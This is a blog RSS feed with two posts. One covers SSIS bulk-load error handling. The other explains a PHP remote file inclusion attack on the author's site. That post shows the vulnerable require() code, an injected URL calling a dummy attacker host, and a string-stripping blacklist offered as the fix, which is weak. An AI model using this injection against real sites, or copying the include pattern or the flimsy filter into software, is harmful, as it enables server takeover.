<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Intermz.com / the blog &#187; Development Tips</title>
	<atom:link href="http://www.intermz.com/blog/category/development-tips/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.intermz.com/blog</link>
	<description>The Intermz.com blog about learning, doing, and everything in between.</description>
	<pubDate>Tue, 06 Jan 2009 16:25:31 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.3</generator>
	<language>en</language>
			<item>
		<title>SSIS: Solving Load Performance vs. Row-Level Error Handling</title>
		<link>http://www.intermz.com/blog/2008/04/08/ssis-solving-load-performance-vs-row-level-error-handling/</link>
		<comments>http://www.intermz.com/blog/2008/04/08/ssis-solving-load-performance-vs-row-level-error-handling/#comments</comments>
		<pubDate>Wed, 09 Apr 2008 01:30:04 +0000</pubDate>
		<dc:creator>Ted Pin</dc:creator>
		
		<category><![CDATA[Development Tips]]></category>

		<category><![CDATA[Error handling]]></category>

		<category><![CDATA[Integration Services]]></category>

		<category><![CDATA[OLE DB]]></category>

		<category><![CDATA[Performance]]></category>

		<category><![CDATA[SSIS]]></category>

		<guid isPermaLink="false">http://www.intermz.com/blog/2008/04/08/ssis-solving-load-performance-vs-row-level-error-handling/</guid>
		<description><![CDATA[I&#8217;ve been working with SSIS a lot and recently ran into a brick wall involving the apparent conflict between load performance and handling load-rejected rows on a row-by-row basis. Fortunately, I was able to design a solution for it, and hopefully my experience can help you. Here is the situation I encountered:
I had a [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been working with SSIS a lot and recently ran into a brick wall involving the apparent conflict between load performance and handling load-rejected rows on a row-by-row basis. Fortunately, I was able to design a solution for it, and hopefully my experience can help you. Here is the situation I encountered:</p>
<p align="left">I had a number of packages, each of which loads a SQL Server 2005 table from a different flat file. The architecture of the system these packages belong to includes a data quality exception process that logs every row that fails insertion (which in turn triggers a report of the error).</p>
<p align="left">An OLE DB Destination component handled the record insertions, which allowed me to redirect failing rows to an error file (a SQL Server Destination does not support this).</p>
<p align="left">So here is where the problem occurred. To make the OLE DB Destination perform at all efficiently, you usually set the data access mode to &#8220;fast load&#8221; and set the rows-per-batch and maximum-insert-commit-size parameters appropriately, which usually means values in the hundreds to thousands, depending on record width, etc.</p>
<p align="left">That provides quick loading but poses a problem if you want to send individual rejected rows to an error file: if a row fails, the entire batch it belongs to (say, 500 records) is rolled back and sent to the error file. Your error file then contains 1 erroneous record and 499 <em>valid</em> records, which is obviously not what you want.</p>
<p align="left">The obvious fix would be to set the maximum insert commit size to 1, so that each record is committed on its own and only the rejected rows get sent to the error file. But, of course, this creates a huge performance problem with large record sets (e.g., 100,000 rows); it can be nightmarishly slow.</p>
<p align="left">Here&#8217;s how I solved the problem and maintained performance and  single-row error handling. It&#8217;s really simple actually:</p>
<p align="left">Create two stages of OLE DB Destination insertion. The first one  is for performance and the second one is for row-level control. How does this  work?</p>
<p align="left">Send your rows to the first OLE DB Dest called &#8220;Attempt  1&#8243; and set the max commit to something with good performance (500 rows  or something). I set the batch to some multiple of that, like 1000.</p>
<p align="left">Create a second OLE DB Dest called &#8220;Attempt 2&#8243;, and set the max  commit to 1 and a batch equal to the max commit of Attempt 1. Then redirect all  the error rows from Attempt 1 to Attempt 2. Route the error rows from Attempt 2  to your error file.</p>
<p align="left">Source &gt;&gt; Transforms &gt;&gt; Attemp 1 &gt;&gt; Attempt 2  &gt;&gt; Error file (or other)</p>
<p align="left">This works because: Assuming there are more valid rows in your  source than invalid rows, your Attempt 1 will commit everything it can in large  batches, which will perform very well. Say you have 100,000 records, committing  at 500 at a time, you&#8217;re only doing 200 commits. Now, when an erroneous row is  encountered, the 500 rows are sent to Attempt 2 - which commits one at a time,  committing all of the valid rows in that batch, and redirecting the few invalid  records. Let&#8217;s say you have 5 invalid rows in 5 different batches,  then you&#8217;d send 5 * 500 = 2,500 rows to be committed one at a time -  instead of 100,000.</p>
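<p>The arithmetic above can be written as a tiny cost model. This is a hypothetical sketch that counts commit attempts only and assumes every failed batch is full-sized; real run times also depend on record width, indexes, logging and so on.</p>

```python
import math


def commits_one_at_a_time(n_rows):
    # Single destination with a maximum insert commit size of 1: one commit per row.
    return n_rows


def commits_two_stage(n_rows, batch_size, failed_batches):
    """Commit attempts for the two-attempt approach (hypothetical cost model).

    Attempt 1 tries ceil(n_rows / batch_size) batch commits (failed ones roll
    back); every row of a failed batch is then retried one at a time.
    """
    batch_attempts = math.ceil(n_rows / batch_size)
    single_row_attempts = failed_batches * batch_size
    return batch_attempts + single_row_attempts


print(commits_one_at_a_time(100_000))      # 100000
print(commits_two_stage(100_000, 500, 5))  # 2700 (200 batch commits + 2,500 single-row attempts)
```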
<p align="left">To give you an idea of the kind performance improvement you can  get using this method (versus committing all rows one at a time with a single  OLE DB Destination), loading 1.6M rows with two attempts took 6.5 minutes,  whereas committing one at a time took 3.5 HOURS. The two-attempt method is  orders of magnitude faster and still allows me to capture errors on a row-by-row  basis.</p>
<p align="left">Happy plumbing!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.intermz.com/blog/2008/04/08/ssis-solving-load-performance-vs-row-level-error-handling/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Preventing URL Injection Attacks</title>
		<link>http://www.intermz.com/blog/2007/10/20/preventing-url-injection-attacks/</link>
		<comments>http://www.intermz.com/blog/2007/10/20/preventing-url-injection-attacks/#comments</comments>
		<pubDate>Sat, 20 Oct 2007 16:02:59 +0000</pubDate>
		<dc:creator>Ted Pin</dc:creator>
		
		<category><![CDATA[Development Tips]]></category>

		<guid isPermaLink="false">http://intermz.com/blog/?p=9</guid>
		<description><![CDATA[Although I was supremely irritated that someone was hacking intermz and uploading malicious files (e.g., eBay phishing files) to the server, I have to give those hackers credit for the effectiveness and simplicity of their hack, which I will call a &#8220;URL injection&#8221; attack. (This differs from a SQL injection attack, which is another [...]]]></description>
			<content:encoded><![CDATA[<p>Although I was supremely irritated that someone was hacking intermz and uploading malicious files (e.g., eBay phishing files) to the server, I have to give those hackers credit for the effectiveness and simplicity of their hack, which I will call a &#8220;URL injection&#8221; attack. (This differs from a SQL injection attack, which is another problem you should worry about. There is plenty of good information on preventing SQL injection <a href="http://fi.php.net/pdo-prepare">out there</a>.) I am going to document how they did it here, in the hope of helping you web developers prevent this from happening to you.</p>
<p>First, let me briefly describe how the intermz site works. It follows a very simple &#8220;template/content&#8221; paradigm. Basically, I designed a single frame (the template) that I load all other pages (the content) into, so that every page looks the same, and if I need to make a change, I can make it to the template and every page will reflect it. I used a basic &#8220;page&#8221; parameter in my GET string to pass the name of the .php file to load into the template. It works like this:</p>
<p>Example URL:</p>
<p><strong>http://www.intermz.com/default.php?page=home</strong></p>
<p>The PHP code takes the &#8220;page&#8221; parameter and:</p>
<p><strong>$page = $_GET['page'];</strong><br />
<strong>require($page . '.php');</strong></p>
<p>The gist of what the hackers did was pass in a page parameter that was the URL of a PHP script of their own:</p>
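<p>For readers less familiar with PHP, the sketch below mimics in Python how the template turns a request into a file to include. The include_target() helper is hypothetical; the point is that whatever string arrives in the page parameter is used verbatim, with &#8220;.php&#8221; appended and no validation.</p>

```python
from urllib.parse import parse_qs, urlsplit


def include_target(request_url):
    """Hypothetical mimic of the template's require($page . '.php') path building.

    Reads the raw "page" value from the query string and appends ".php",
    with no validation, just as the original PHP does.
    """
    query = urlsplit(request_url).query
    page = parse_qs(query)["page"][0]
    return page + ".php"


print(include_target("http://www.intermz.com/default.php?page=home"))
# home.php
```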
<p><strong>http://www.intermz.com/default.php?page=<em>http://www.hackerserver123.com/maliciousCode.php?</em></strong></p>
<p>(Note: I&#8217;ve replaced the actual hack-script URL with a dummy URL so no one will go out there and try to use it.)</p>
<p>What this allows them to do is run their script on my server, letting them upload and delete files on it without needing FTP access. (See the screenshot below for what that looks like.) If you are a coder, you might have noticed that the <strong>require()</strong> call above appends &#8220;.php&#8221; to whatever page is passed in, so the server would have tried to load &#8220;&#8230;<strong><em>maliciousCode.php.php</em></strong>&#8221;, which would have failed. But if you look closely, you will notice that the injected URL ends with a &#8220;<em><strong>?</strong></em>&#8221;. This is the very clever part: it means the &#8220;.php&#8221; that my <strong>require()</strong> call appends becomes the URL&#8217;s query string, a perfectly legal (although unused) <em>parameter</em>.</p>
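<p>Python&#8217;s standard URL parser shows why the trailing &#8220;?&#8221; matters. This sketch uses the dummy URL from above and only illustrates URL syntax, not PHP&#8217;s internals.</p>

```python
from urllib.parse import urlsplit

# The attacker's page value plus the ".php" suffix that require() appends.
# (Dummy URL, as in the post.)
target = "http://www.hackerserver123.com/maliciousCode.php?" + ".php"

parts = urlsplit(target)
print(parts.netloc)  # www.hackerserver123.com
print(parts.path)    # /maliciousCode.php
print(parts.query)   # .php

# Without the trailing "?", the suffix lands in the path instead:
print(urlsplit("http://www.hackerserver123.com/maliciousCode.php" + ".php").path)
# /maliciousCode.php.php
```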
<p>So how do you stop this kind of attack?</p>
<p>Well, I built a filter to remove any part of the page parameter that might make it an outside URL:</p>
<p><strong>$filter = array('http://', 'www', '.');<br />
$replace = array('');<br />
$page = str_ireplace($filter, $replace, $_GET['page']);</strong></p>
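<p>To see what the filter does to an injected value, here is a rough Python stand-in for PHP&#8217;s str_ireplace() with array arguments (the helper name str_ireplace_like is made up for this sketch). Each search term is removed case-insensitively, in order, with each pass working on the output of the previous one.</p>

```python
import re


def str_ireplace_like(search, replace, subject):
    """Rough Python stand-in for PHP's str_ireplace() with array arguments.

    Search terms are applied in order, case-insensitively. Terms without a
    matching replacement use "", as PHP does when the replace array is
    shorter than the search array.
    """
    for i, term in enumerate(search):
        repl = replace[i] if len(replace) > i else ""
        # A lambda keeps repl literal (no backslash-escape processing).
        subject = re.sub(re.escape(term), lambda _m: repl, subject, flags=re.IGNORECASE)
    return subject


FILTER = ["http://", "www", "."]
REPLACE = [""]

for page in ["home", "http://www.hackerserver123.com/maliciousCode.php?"]:
    print(str_ireplace_like(FILTER, REPLACE, page))
# home
# hackerserver123com/maliciousCodephp?
```

<p>With the scheme and the dots gone, require() would receive a relative local path (hackerserver123com/maliciousCodephp?.php) rather than a remote URL, so the include fails instead of fetching the attacker&#8217;s script.</p>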
<p>So far, this has stopped the hacks.</p>
<p>Hope this helps you guys!</p>
<p><a href="http://intermz.com/blog/wp-content/uploads/2007/10/hack_screenshot.png" title="PHP Hack Screenshot"><img src="http://intermz.com/blog/wp-content/uploads/2007/10/hack_screenshot.png" alt="PHP Hack Screenshot" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.intermz.com/blog/2007/10/20/preventing-url-injection-attacks/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>

